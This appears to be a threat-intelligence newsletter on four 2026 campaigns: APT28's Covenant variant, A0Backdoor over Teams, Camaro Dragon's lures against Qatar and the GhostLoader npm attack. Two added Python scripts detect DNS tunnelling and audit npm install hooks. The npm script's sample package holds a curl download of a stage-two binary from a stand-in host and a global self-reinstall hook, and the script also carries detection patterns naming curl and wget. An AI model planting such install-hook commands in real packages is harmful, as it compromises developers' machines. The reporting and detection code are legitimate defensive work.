Trending Topics

TRENDING TOPICS MAR 10, 2026

APT28 Revives Espionage Operations with Custom Covenant Variant and Dual-Implant Toolkit

ESET researchers are reporting that the Russian state-linked threat group APT28 (also known as Fancy Bear, Sednit, Forest Blizzard, and Strontium) has resumed advanced cyber-espionage operations using a customized version of the open-source Covenant post-exploitation framework alongside a bespoke implant named BeardShell. The campaign has been active since at least April 2024 and has primarily targeted Ukrainian government and military networks, including central executive bodies. Initial access in recent operations leveraged malicious Microsoft Office documents exploiting CVE-2026-21509 to deploy the SlimAgent keylogger, which captures keystrokes, screenshots, and clipboard data from infected systems. Once access is established, attackers deploy BeardShell, a PowerShell-capable implant that communicates with command-and-control infrastructure through the legitimate cloud storage provider Icedrive, allowing malicious traffic to blend with legitimate cloud activity. ESET has also identified a distinctive obfuscation technique in BeardShell previously observed in the APT28 Xtunnel toolset from the 2010s, indicating continuity within the group’s long-standing development pipeline. The campaign’s primary implant is a heavily modified version of Covenant, an open-source .NET command-and-control framework adapted by APT28 developers for long-term espionage operations. The group altered Covenant’s execution flow to evade behavioral detection and replaced its random identifier generation with deterministic host-based identifiers, allowing operators to track compromised systems consistently across reboots. Additional modifications introduced cloud-based command-and-control protocols using legitimate storage providers, including pCloud, Koofr, and, most recently, Filen, significantly complicating traditional network-based detection.
ESET also observed compromised machines remaining under surveillance for more than six months, demonstrating the group’s emphasis on persistent intelligence gathering rather than short-term disruption. The dual-implant architecture also provides operational redundancy, with Covenant serving as the primary access channel and BeardShell as a fallback if the infrastructure is disrupted.

A0Backdoor Deployed Through Microsoft Teams Impersonation and Quick Assist Social Engineering

BlueVoyant has identified a campaign targeting healthcare and financial sectors in which attackers impersonate IT support staff over Microsoft Teams to gain remote access and deploy a newly discovered malware family known as A0Backdoor. The intrusion typically begins with an email-bombing tactic designed to overwhelm a user’s inbox, after which the attacker contacts the victim on Teams, offering assistance and persuading them to launch a Quick Assist remote session. Once access is obtained, the attackers deploy digitally signed MSI installers masquerading as Microsoft Teams or CrossDeviceService components hosted on Microsoft cloud storage. These installers trigger DLL sideloading through a malicious hostfxr.dll, which decrypts embedded shellcode that ultimately loads the A0Backdoor payload in memory. The loader includes anti-analysis features such as excessive thread creation, sandbox checks, and staged decryption routines that obscure the final payload until runtime. BlueVoyant researchers assess that the activity aligns with a cluster tracked as Blitz Brigantine (Storm-1811/STAC5777) and shows overlap with techniques previously used by affiliates linked to Black Basta ransomware operations. Once executed, A0Backdoor relocates itself in memory, decrypts its internal routines, and fingerprints the infected host using Windows API calls to collect system identifiers and environment data. The malware communicates with its command-and-control infrastructure via covert DNS tunneling, issuing MX record queries that embed encoded metadata in high-entropy subdomains and send them to public recursive resolvers. Command responses are embedded in the returned MX record hostnames, allowing the malware to exchange instructions while appearing as legitimate DNS traffic and avoiding direct connections to attacker infrastructure. 
BlueVoyant also observed attackers re-registering older domains and operating their own authoritative DNS servers to deliver these encoded responses, helping the traffic blend into normal enterprise DNS activity. This shift away from direct HTTPS backconnect channels toward DNS-based communication represents a notable evolution in the actor’s operational security. Organizations should restrict external Quick Assist sessions, implement verification procedures for IT support interactions conducted through collaboration platforms such as Microsoft Teams, monitor DNS traffic for high-entropy subdomains or anomalous MX query patterns, and deploy endpoint detection that can identify MSI-based installers and DLL sideloading activity.
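The recommendation above (monitor DNS for high-entropy subdomains and anomalous MX query patterns) is straightforward to turn into a triage script. The following is an added example, not code from BlueVoyant or from the report; the log line format, the entropy and label-length thresholds, and the sample log lines are all constructed assumptions for this illustration. It computes Shannon entropy on the leftmost label of each MX query, flags long high-entropy labels, and then aggregates by client so a single odd lookup is ignored while a burst from one host surfaces for review.

```python
import math
from collections import Counter

# Constructed sample resolver log for this example (not from the BlueVoyant report).
# Assumed line format: "<timestamp> <client_ip> <qtype> <qname>".
SAMPLE_LOG = """\
2026-03-10T08:00:01Z 10.1.2.3 A www.example.com
2026-03-10T08:00:02Z 10.1.2.3 MX example.com
2026-03-10T08:00:03Z 10.1.2.4 MX k7q2xz9vb3m0pw5r8tlh2c4n.zyx-lookup.example
2026-03-10T08:00:04Z 10.1.2.4 MX 3f9qz1xv7b2mk8wp.zyx-lookup.example
2026-03-10T08:00:05Z 10.1.2.4 MX j5t8hr0cn2ld6yxa9eq4.zyx-lookup.example
2026-03-10T08:00:06Z 10.1.2.5 A mail.example.com
"""


def shannon_entropy(text: str) -> float:
    """Shannon entropy in bits per character (0.0 for an empty string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def parse_line(line: str):
    """Split one log line into fields; returns None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qtype, qname = parts
    return {"ts": ts, "client": client, "qtype": qtype.upper(),
            "qname": qname.rstrip(".").lower()}


def is_tunnel_like(qname: str, qtype: str, *, qtypes=("MX",),
                   entropy_threshold: float = 3.5, min_label_len: int = 16) -> bool:
    """Heuristic: a long, high-entropy leftmost label on a query type that ordinary
    endpoints rarely issue in volume (MX by default). Thresholds are tuning
    assumptions for this example, not values taken from the report."""
    if qtype not in qtypes:
        return False
    label = qname.split(".")[0]
    return len(label) >= min_label_len and shannon_entropy(label) >= entropy_threshold


def find_tunnel_candidates(log_text: str, **kwargs):
    """Return one record per query that matches the heuristic, with its label entropy."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_tunnel_like(rec["qname"], rec["qtype"], **kwargs):
            rec["entropy"] = round(shannon_entropy(rec["qname"].split(".")[0]), 2)
            hits.append(rec)
    return hits


def clients_over_threshold(hits, min_hits: int = 3):
    """Aggregate per client: one odd query is noise, a burst from one host is a lead."""
    counts = Counter(h["client"] for h in hits)
    return {client: n for client, n in counts.items() if n >= min_hits}


if __name__ == "__main__":
    hits = find_tunnel_candidates(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['client']} {h['qtype']} {h['qname']} entropy={h['entropy']}")
    print("clients to triage:", clients_over_threshold(hits))
```

On the constructed log, the three MX queries from 10.1.2.4 are flagged and that client is returned for triage, while the ordinary A and MX lookups pass. In production the thresholds need tuning against a baseline of your own resolver logs, and CDN or cloud-service hostnames with long opaque labels are a known false-positive source, so the per-client aggregation matters more than any single hit.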

China-Linked Camaro Dragon Campaign Targets Qatar Using Conflict-Themed PlugX and Cobalt Strike Lures

CheckPoint has observed a China-nexus cyber-espionage campaign targeting organizations in Qatar shortly after the escalation of conflict in the Middle East. Within one day of the launch of Operation Epic Fury, the threat actor tracked as Camaro Dragon began distributing archives disguised as images of Iranian missile strikes near a U.S. base in Bahrain. When executed, a malicious LNK file initiated a multi-stage infection chain that ultimately deployed the PlugX backdoor through DLL hijacking of a legitimate Baidu NetDisk binary. PlugX, a long-standing modular remote access trojan used by several Chinese APT groups since at least 2008, enables remote command execution, keystroke logging, screen capture, and data exfiltration. CheckPoint noted that the same infection chain had been observed months earlier in attacks targeting Turkish military organizations, suggesting a sustained intelligence-collection focus across the broader Middle East. A separate campaign attributed to PRC-linked actors further reinforces their expanding cyber activity in the Middle East. This operation, likely targeting Qatari entities, used password-protected archives containing AI-generated lure content that impersonated official Israeli communications reporting attacks on Gulf energy infrastructure. These lures delivered a previously unseen Rust-based loader that exploited DLL hijacking of the nvdaHelperRemote.dll component from the NVDA screen reader, ultimately deploying the Cobalt Strike framework for post-exploitation activity. The use of the NVDA component, abuse of infrastructure registered through Kaopu Cloud and Cloudflare, and the deployment of Cobalt Strike align with tactics previously observed in China-linked operations across Southeast Asia and the Middle East. 
Researchers assess that the campaign demonstrates how rapidly Chinese-aligned espionage actors adapt their targeting to geopolitical developments, leveraging breaking news and regional crises to increase lure credibility. Qatar’s role as a strategic diplomatic and energy hub likely increases its intelligence value during periods of regional instability. The campaign illustrates how opportunistic cyber-espionage operations can pivot quickly to new targets when geopolitical tensions create new intelligence-collection opportunities.

GhostLoader Supply Chain Attack Disguises as OpenClaw npm Package to Deploy Persistent RAT

Security researchers at JFrog discovered a malicious npm package masquerading as a legitimate OpenClaw installer, which delivered a multi-stage malware campaign internally identified as GhostLoader. The package abuses npm’s postinstall hook to silently reinstall itself globally and execute an obfuscated setup script that presents a convincing fake CLI installation process. During the installation, the script displays a fraudulent macOS Keychain authorization prompt designed to trick users into entering their system password while simultaneously downloading an encrypted second-stage payload from the attacker-controlled infrastructure at trackpipe[.]dev. Once executed, the payload decrypts and launches a detached background process before deleting the temporary installer file to obscure forensic traces. The attack leverages social engineering, encrypted payload delivery, and staged execution to bypass static detection while harvesting credentials directly from the operating system authentication mechanism. The second-stage payload is a full-featured information stealer and remote access trojan that establishes persistence through hidden directories, shell profile hooks, and scheduled tasks disguised as npm telemetry services. The malware performs extensive data collection, including macOS Keychain databases, browser credentials and cookies, cryptocurrency wallets and seed phrases, SSH keys, and developer credentials associated with AWS, Azure, Google Cloud, Kubernetes, Docker, and GitHub. It also scans for AI agent configuration files and developer tooling artifacts, highlighting a growing trend of targeting modern development ecosystems. Stolen data is compressed and exfiltrated through multiple channels, including direct C2 uploads, Telegram bots, and cloud file-sharing services, ensuring redundancy if one channel fails. 
After installation, the malware operates as a persistent daemon capable of clipboard monitoring, command execution, SOCKS5 proxy creation, and live browser session cloning, allowing attackers to hijack authenticated web sessions without credentials. The campaign demonstrates how software supply-chain attacks can combine credential harvesting, espionage, and remote access capabilities into a single malicious package distributed through a trusted developer ecosystem.
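Because the GhostLoader package relied on npm's postinstall hook to re-install itself globally and run its setup script, a useful defensive habit is to inventory which installed packages declare install-time lifecycle scripts at all. The following is an added example, not code from JFrog or from the OpenClaw project; the package names, the manifest contents, and the two heuristic regexes (a global self-reinstall and a network fetch inside a hook) are constructed for this illustration. It walks `node_modules`, lists every package with a `preinstall`, `install`, or `postinstall` script, and flags the patterns described above.

```python
import json
import os
import re
import tempfile

# Lifecycle scripts npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Heuristic patterns chosen for this example; they flag hooks worth a manual look.
GLOBAL_REINSTALL = re.compile(r"\bnpm\s+(?:i|install)\b[^&|;]*?(?:\s-g\b|\s--global\b)")
NETWORK_FETCH = re.compile(r"\b(?:curl|wget|Invoke-WebRequest)\b", re.IGNORECASE)


def audit_package(pkg_dir: str):
    """Read one package.json; return a finding if it declares install hooks, else None."""
    try:
        with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as fh:
            data = json.load(fh)
    except (OSError, ValueError):
        return None
    scripts = data.get("scripts") or {}
    hooks = {h: str(scripts[h]) for h in INSTALL_HOOKS if h in scripts}
    if not hooks:
        return None
    commands = " ".join(hooks.values())
    flags = []
    if GLOBAL_REINSTALL.search(commands):
        flags.append("global-self-reinstall")
    if NETWORK_FETCH.search(commands):
        flags.append("network-fetch")
    return {"name": data.get("name", os.path.basename(pkg_dir)),
            "hooks": hooks, "flags": flags}


def audit_node_modules(project_root: str):
    """Walk node_modules (nested copies included) and collect packages with install hooks."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(os.path.join(project_root, "node_modules")):
        if "package.json" in filenames:
            finding = audit_package(dirpath)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: f["name"])


def build_constructed_tree(project_root: str):
    """Write a small constructed node_modules tree for the demo (no real packages)."""
    packages = {
        "plain-lib": {"name": "plain-lib", "version": "1.0.0"},
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        "fake-openclaw": {"name": "fake-openclaw", "version": "0.0.1",
                          "scripts": {
                              "preinstall": "curl -fsSL https://example.invalid/stage2.bin -o /tmp/stage2.bin",
                              "postinstall": "npm install -g fake-openclaw --silent && node setup.js"}},
    }
    for name, manifest in packages.items():
        pkg_dir = os.path.join(project_root, "node_modules", name)
        os.makedirs(pkg_dir, exist_ok=True)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)


def demo():
    """Build the constructed tree in a temporary directory and audit it; returns the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_constructed_tree(root)
        return audit_node_modules(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['name']}: hooks={list(f['hooks'])} flags={f['flags'] or ['none']}")
```

Point `audit_node_modules` at a real project root to list hooks in an existing install. Legitimate native add-ons (the `node-gyp rebuild` case) will show up with no flags, which is the expected noise; a package whose hook reinstalls itself globally or fetches from the network during install is the pattern to review before trusting it. Running `npm install --ignore-scripts` in CI prevents these hooks from executing at all, which is the simplest mitigation for the install-time part of this campaign.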

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.